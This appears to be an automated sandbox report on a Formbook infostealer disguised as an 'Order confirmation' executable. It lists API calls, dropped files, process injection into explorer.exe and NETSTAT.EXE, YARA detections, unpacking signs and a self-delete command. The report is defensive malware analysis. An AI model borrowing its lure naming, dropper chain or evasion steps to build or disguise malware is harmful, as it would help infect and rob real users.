          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe Code function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B95778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe Code function: 0_2_00406925
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B533B7
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B31663
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B523F5
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00BB8400
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B66502
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B6265E
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B5282A
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B689BF
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00BB0A3A
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B66A74
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B8EDB2
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B40D06
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B5CD51
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00BB0EB7
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B98E44
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B66FE6
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B3B020
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B394E0
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B5F409
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B4D45D
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B516B4
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B3F6A0
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B4F628
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B578C3
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B5DBA5
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B51BA8
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B39C80
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B69CE5
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B4DD28
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B5BFD6
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B51FC0
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_0041C06A
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00401030
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_0041A29C
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_0041BB53
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_0041BBBB
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00408C4B
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00408C50
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_0041C4F3
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_0041B493
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00402D87
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00402D90
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_0041B666
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00402FB0
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00ED28EC
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00E320A0
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00ED20A8
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00E1B090
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00EC1002
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00E24120
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00E0F900
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00ED22AE
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00ECDBD2
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00E3EBB0
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00ED2B28
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00ECD466
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00E1841F
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00E1D5E0
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00ED25DD
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00E32581
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00ED1D55
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00E00D20
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00ED2D07
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00ED2EF7
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00E26E30
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: 2_2_00ED1FF1
          Source: C:\Windows\explorer.exe Code function: 4_2_07027902
          Source: C:\Windows\explorer.exe Code function: 4_2_0702A302
          Source: C:\Windows\explorer.exe Code function: 4_2_07028362
          Source: C:\Windows\explorer.exe Code function: 4_2_0702E5B2
          Source: C:\Windows\explorer.exe Code function: 4_2_0702D7C7
          Source: C:\Windows\explorer.exe Code function: 4_2_0702C062
          Source: C:\Windows\explorer.exe Code function: 4_2_070278F9
          Source: C:\Windows\explorer.exe Code function: 4_2_0702A2FF
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_032EBB53
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_032EA29C
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_032D2FB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_032D2D87
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_032D2D90
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_032D8C4B
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_032D8C50
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_032EB493
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Code function: 12_2_032EC4F3
          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe B31445FC4B8803D1B7122A6563002CFE3E925FFD1FDC9B84FBA6FC78F6A8B955
          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: String function: 00B41A36 appears 34 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: String function: 00B58B30 appears 42 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: String function: 00B50D17 appears 70 times
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe Code function: String function: 00E0B150 appears 35 times
          Source: lqqebhptsg.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lqqebhptsg.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lqqebhptsg.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lqqebhptsg.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lqqebhptsg.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: lqqebhptsg.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9rd1hxro.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9rd1hxro.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9rd1hxro.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9rd1hxro.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9rd1hxro.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 9rd1hxro.exe.1.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: Order confirmation 64236000000025 26.01.2021.exe, 00000000.00000002.259983047.00000000027B2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs Order confirmation 64236000000025 26.01.2021.exe
          Source: Order confirmation 64236000000025 26.01.2021.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.256150994.0000000004DC0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.625191007.0000000000640000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000C.00000002.626416806.00000000032D0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.291015607.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.291095768.00000000004B0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000001.250721725.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.291143508.00000000008E0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.9rd1hxro.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.lqqebhptsg.exe.4dc0000.1.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.1.9rd1hxro.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engine Classification label: mal100.troj.evad.winEXE@9/5@16/15
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B9A6AD GetLastError,FormatMessageW,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe Code function: 0_2_00403461 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B88DE9 AdjustTokenPrivileges,CloseHandle,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B89399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe Code function: 0_2_0040473E GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B94148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Code function: 1_2_00B9443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_01
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe File created: C:\Users\user\AppData\Local\Temp\nsmE342.tmp
          Source: Order confirmation 64236000000025 26.01.2021.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe File read: C:\Users\desktop.ini
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
          Source: Order confirmation 64236000000025 26.01.2021.exe ReversingLabs: Detection: 50%
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe File read: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe
          Source: unknown Process created: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe 'C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe'
          Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
          Source: unknown Process created: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
          Source: unknown Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe'
          Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe Process created: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe Process created: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exe C:\Users\user\AppData\Local\Temp\Nla\kwalgxu.u
          Source: C:\Windows\SysWOW64\NETSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exe'
          Source: C:\Users\user\Desktop\Order confirmation 64236000000025 26.01.2021.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
          Source: Order confirmation 64236000000025 26.01.2021.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: lqqebhptsg.exe, 00000001.00000003.248297924.0000000004FE0000.00000004.00000001.sdmp, 9rd1hxro.exe, 00000002.00000002.291392263.0000000000EFF000.00000040.00000001.sdmp, NETSTAT.EXE, 0000000C.00000002.626687203.000000000351F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: lqqebhptsg.exe, 00000001.00000003.248297924.0000000004FE0000.00000004.00000001.sdmp, 9rd1hxro.exe, NETSTAT.EXE, 0000000C.00000002.626687203.000000000351F000.00000040.00000001.sdmp

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeUnpacked PE file: 2.2.9rd1hxro.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R; vs .text:ER;
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00BAC6D9 LoadLibraryA,GetProcAddress,
          Source: 9rd1hxro.exe.1.drStatic PE information: real checksum: 0xdf890 should be: 0xe835e
          Source: Order confirmation 64236000000025 26.01.2021.exeStatic PE information: real checksum: 0x0 should be: 0x9b8d4
          Source: C:\Users\user\AppData\Local\Temp\Nla\lqqebhptsg.exeCode function: 1_2_00B58B75 push ecx; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041C974 push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004089CE push edx; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041C9EC push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041C991 push esp; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004152A2 push dword ptr [ebx+ecx*2-3Fh]; retf
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_004153CE push ds; retf
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041B3F2 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041B3FB push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041B3A5 push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041B45C push eax; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041C4E3 push ebx; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_0041C48C push dword ptr [F84D205Dh]; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00407E1A push ss; ret
          Source: C:\Users\user\AppData\Local\Temp\Nla\9rd1hxro.exeCode function: 2_2_00E5D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EB3A5 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EB3FB push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EB3F2 push eax; ret
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E53CE push ds; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EBA67 push ss; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC248 push ss; iretd
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032E52A2 push dword ptr [ebx+ecx*2-3Fh]; retf
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 12_2_032EC974 push esp; ret
